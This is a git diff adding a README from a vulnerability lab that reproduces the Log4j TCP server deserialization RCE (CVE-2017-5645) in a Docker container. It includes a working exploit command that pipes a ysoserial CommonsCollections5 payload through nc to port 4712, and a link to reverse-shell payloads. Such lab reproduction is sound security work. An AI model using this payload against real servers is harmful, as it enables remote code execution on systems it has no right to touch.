first commit

log4j/CVE-2017-5645/README.md

@@ -0,0 +1,38 @@
+# Apache Log4j TCP Server Deserialization Remote Code Execution (CVE-2017-5645)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Log4j is a logging library for Java that supports starting remote logging servers. A security vulnerability exists in versions 2.x before 2.8.2 of Apache Log4j TCP Server. Attackers can exploit this vulnerability to execute arbitrary code.
+
+References:
+
+- https://issues.apache.org/jira/browse/LOG4J2-1863
+- https://github.com/pimps/CVE-2017-5645
+
+## Environment Setup
+
+Execute the following command to start a Log4j 2.8.1 TCP server:
+
+```
+docker compose up -d
+```
+
+After the environment starts, a TCP server will be opened on port 4712.
+
+Note: Besides using Vulhub's docker image to set up the environment, we can directly start this TCP server from the command line after downloading the log4j jar files: `java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`, without needing to use Vulhub or write code.
+
+## Vulnerability Reproduction
+
+We use ysoserial to generate a payload, then send it directly to the `your-ip:4712` port.
+
+```
+java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
+```
+
+Then execute `docker compose exec log4j bash` to enter the container, and you can see that /tmp/success has been successfully created:
+
+![](1.png)
+
+Execute a [reverse shell command](http://www.jackson-t.ca/runtime-exec-payloads.html) to successfully get a shell:
+
+![](2.png)